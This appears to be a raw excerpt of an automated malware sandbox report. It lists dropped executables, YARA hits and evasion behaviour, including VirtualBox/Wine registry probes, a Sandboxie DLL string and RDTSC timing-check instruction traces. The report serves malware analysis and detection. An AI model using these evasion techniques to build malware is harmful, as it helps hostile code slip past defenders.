Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: Macromedia.com, 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37FDE second address: D37FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC910593h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D36ED4 second address: D36EE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D36EE0 second address: D36EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371C3 second address: D371C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371C7 second address: D371CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371CD second address: D371DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC4CCEF6ADCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371DB second address: D371FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Eh 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007FC4CC91058Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3739A second address: D373A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373A0 second address: D373BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 jmp 00007FC4CC91058Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373BD second address: D373C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373C3 second address: D37406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FC4CC910598h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007FC4CC910586h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007FC4CC91058Dh 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37406 second address: D37412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FC4CCEF6AD6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37412 second address: D3743A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910594h 0x00000007 je 00007FC4CC910586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jne 00007FC4CC910586h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3743A second address: D3743E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D376EE second address: D37727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 js 00007FC4CC910586h 0x0000000f popad 0x00000010 jmp 00007FC4CC91058Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007FC4CC910590h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37727 second address: D37742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6AE5h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D378CF second address: D378D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39397 second address: D3939D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3939D second address: D39426 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC4CC910592h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D3481h], edx 0x00000014 mov esi, edi 0x00000016 push 00000000h 0x00000018 mov cx, di 0x0000001b push 08C94595h 0x00000020 jmp 00007FC4CC91058Bh 0x00000025 xor dword ptr [esp], 08C94515h 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+122D2A59h] 0x00000036 mov dx, 7C7Dh 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FC4CC910588h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 call 00007FC4CC910589h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jc 00007FC4CC910586h 0x00000064 push ecx 0x00000065 pop ecx 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39426 second address: D3942B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3942B second address: D39437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39437 second address: D3943D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3943D second address: D39457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jno 00007FC4CC91058Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39457 second address: D3945D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3945D second address: D3946A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3946A second address: D394CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jne 00007FC4CCEF6ADCh 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC4CCEF6AD8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movzx edi, di 0x00000035 lea ebx, dword ptr [ebp+1244E185h] 0x0000003b movsx edi, cx 0x0000003e xchg eax, ebx 0x0000003f jmp 00007FC4CCEF6AE0h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a pop edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D394CA second address: D394CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39532 second address: D39536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D4B5E5 second address: D4B5EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27C7E second address: D27C9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CCEF6AE2h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27C9C second address: D27CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27CA0 second address: D27CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27CA6 second address: D27CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5821C second address: D58234 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC4CCEF6AD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58234 second address: D58238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58238 second address: D5823E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5823E second address: D58244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D584F0 second address: D5853E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC4CCEF6AD6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnl 00007FC4CCEF6AD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jg 00007FC4CCEF6ADEh 0x0000001d jnp 00007FC4CCEF6ADEh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC4CCEF6AE0h 0x0000002b jc 00007FC4CCEF6AD8h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5853E second address: D58556 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CC910590h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58556 second address: D5855A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5867A second address: D58693 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC4CC91058Bh 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58693 second address: D5869B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AA3 second address: D58AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC4CC910586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AAE second address: D58AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FC4CCEF6AD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
